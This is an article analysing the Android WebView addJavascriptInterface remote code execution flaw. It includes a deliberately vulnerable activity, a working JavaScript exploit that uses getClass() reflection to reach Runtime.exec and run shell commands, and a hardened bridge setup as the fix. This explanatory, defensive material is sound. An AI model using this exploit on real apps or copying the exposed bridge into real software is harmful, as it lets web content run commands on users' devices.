0x00
This article analyses the Android WebView remote code execution vulnerability. The sample code is at https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo. Let's walk through the code below.
0x01
First, the project directory listing:
The code of MainActivity.java is as follows:
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JsResult;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.widget.Toast;

public class MainActivity extends Activity {
    private WebView webView;
    private Uri mUri;
    private String url;
    // String mUrl1 = "file:///android_asset/html/attack_file.html";
    String mUrl2 = "file:///android_asset/html/test.html";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.webview);
        webView.getSettings().setJavaScriptEnabled(true);
        // Injects the object into page JavaScript as window.JSInterface.
        // Without @JavascriptInterface (and targetSdkVersion >= 17) every
        // public method of the object, including getClass(), is reachable.
        webView.addJavascriptInterface(new JSInterface(), "JSInterface");
        // webView.getSettings().setAllowFileAccessFromFileURLs(true);
        webView.setWebChromeClient(new WebChromeClient() {
            @Override
            public boolean onJsAlert(WebView view, String url, String message, JsResult result) {
                // Required functionality here
                return super.onJsAlert(view, url, message, result);
            }
        });
        webView.loadUrl(mUrl2);
    }

    class JSInterface {
        public String onButtonClick(String text) {
            final String str = text;
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Log.e("leehong2", "onButtonClick: text = " + str);
                    Toast.makeText(getApplicationContext(),
                            "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();
                }
            });
            return "This text was returned from Java layer. JS text = " + text;
        }

        public void onImageClick(String url, int width, int height) {
            final String str = "onImageClick: text = " + url
                    + " width = " + width + " height = " + height;
            Log.i("leehong2", str);
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();
                }
            });
        }
    }
}

The following two lines enable JavaScript and let the loaded HTML call Java code through the injected object:
webView.getSettings().setJavaScriptEnabled(true);
webView.addJavascriptInterface(new JSInterface(), "JSInterface");
Next we look at the HTML file being loaded, which lives in the assets directory:
webView.loadUrl(mUrl2);
test.html is as follows:
For an introduction to HTML and JavaScript, see http://www.w3school.com.cn/html/html_getstarted.asp. The root cause of the vulnerability is the following code:
function execute(cmdArgs) {
    // Walk every global and look for an injected Java object
    for (var obj in window) {
        console.log(window[obj]);
        if ("getClass" in window[obj]) {
            alert(obj);
            // Reflect from the exposed object up to java.lang.Runtime
            return window[obj].getClass().forName("java.lang.Runtime")
                .getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
        }
    }
}
var p = execute(["ls", "/mnt/sdcard/"]);
Any object injected with addJavascriptInterface exposes a public getClass() method. A page running in the WebView can locate such an object, use Java reflection to obtain the java.lang.Runtime object, and then invoke its exec method to run system commands, which is what causes the harm. To see the program's behaviour in detail, download the code and run it.
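For comparison, the same bridge set up the way the platform fix intends. This is an added example, not code from the article's repository; the class name SafeBridgeSetup and the configure method are assumed names, and it assumes a project with targetSdkVersion 17 or higher.

```java
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;

// Added example (not from the WebViewFileDemo project): the hardened bridge.
public final class SafeBridgeSetup {

    // With targetSdkVersion >= 17 only methods carrying @JavascriptInterface
    // are visible to page JavaScript; getClass() and every other inherited or
    // unannotated public method are no longer reachable.
    static class JSInterface {
        @JavascriptInterface
        public String onButtonClick(String text) {
            return "This text was returned from Java layer. JS text = " + text;
        }

        // No annotation: not callable from JavaScript even though it is public.
        public void internalHelper() {
        }
    }

    public static void configure(WebView webView) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);

        // Keep file:// pages (such as test.html) from reading other local
        // files or reaching arbitrary origins. Both setters exist since API 16.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) {
            settings.setAllowFileAccessFromFileURLs(false);
            settings.setAllowUniversalAccessFromFileURLs(false);
        }

        // Older WebViews inject bridges of their own; remove them so the
        // getClass() walk above finds nothing even if the page is hostile.
        webView.removeJavascriptInterface("searchBoxJavaBridge_");
        webView.removeJavascriptInterface("accessibility");
        webView.removeJavascriptInterface("accessibilityTraversal");

        // Below API 17 the annotation is not enforced and every public method
        // would be exposed again, so the bridge is simply not installed there.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new JSInterface(), "JSInterface");
        }
    }
}
```

Call configure(webView) in onCreate in place of the three setup lines shown earlier; the page script from test.html then finds no object with a callable getClass().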
A brief analysis of the Android WebView remote code execution vulnerability